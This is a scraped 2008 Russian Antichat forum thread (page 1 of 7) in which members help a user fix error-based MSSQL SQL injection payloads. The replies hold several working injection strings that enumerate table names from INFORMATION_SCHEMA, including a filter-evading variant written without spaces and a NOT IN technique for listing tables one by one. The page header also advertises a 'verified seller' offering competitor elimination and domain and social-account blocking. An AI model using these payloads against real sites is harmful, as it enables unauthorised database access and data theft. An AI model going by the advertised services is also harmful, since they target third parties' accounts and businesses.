Форум АНТИЧАТ - mssql inj help

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
mssql inj help

Страница 1 из 7

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

mssql inj help

22.03.2008, 13:58

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

Отправить сообщение для -=megahertz=- с помощью ICQ

mssql inj help

При таком запросе
"1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_ SCHEMA.TABLES)--"
показывает
Incorrect syntax near the keyword 'TOP'

в чем моя ошибка?

22.03.2008, 14:10

~~~X3RiX~~~

Banned

Регистрация: 14.03.2008

Сообщений: 36

Провел на форуме:
285523

Репутация: 9

юзай

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

22.03.2008, 14:12

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

"1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION _SCHEMA.TABLES)--"

22.03.2008, 15:08

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

можно проинжектить запрос вобще без использования пробелов:
or(1=(select(max(table_name))from[information_schema].tables))

[ cash ]

__________________
Карфаген должен быть разрушен...

22.03.2008, 15:31

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

спасиб онотолий, помогло

22.03.2008, 16:24

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

снова я
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))--
выводит
'syssegments'
делаю так
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','sy ssegments')))--
выводит
'syssegmentssyssegments'
в след запросе выводит уже
'syssegmentssyssegmentssyssegmentssyssegments'
и т.д.

22.03.2008, 16:39

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

TABLE_NAME+NOT+IN+('syssegments','sy ssegments','syssegmentssyssegments'...итд)))--
таким образом узнаёш все таблицы))
патом также только для столбцов и формеруеш запрос к бд))

22.03.2008, 16:42

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

я знаю что так надо
просто проблема в том что он просто делат так
syssegments
syssegmentssyssegments
syssegmentssyssegmentssyssegmentssyssegments
syssegmentssyssegmentssyssegmentssyssegmentssysseg mentssyssegments
...
так не должно быть

22.03.2008, 16:42

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

-=megahertz=-, покажи полностью, результат выполнения запроса

__________________
Карфаген должен быть разрушен...

#10

22.03.2008, 16:47

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

разграничь при помощи ';'

Страница 1 из 7

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Toolkit для работы с mysql inj от меня	Piflit	PHP, PERL, MySQL, JavaScript	33	09.06.2010 22:03
Mssql уддаленный дамп	delay(0)	Уязвимости	12	08.07.2008 15:36
Чтение данных с MsSql	constanta	Уязвимости	5	25.02.2008 20:05

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход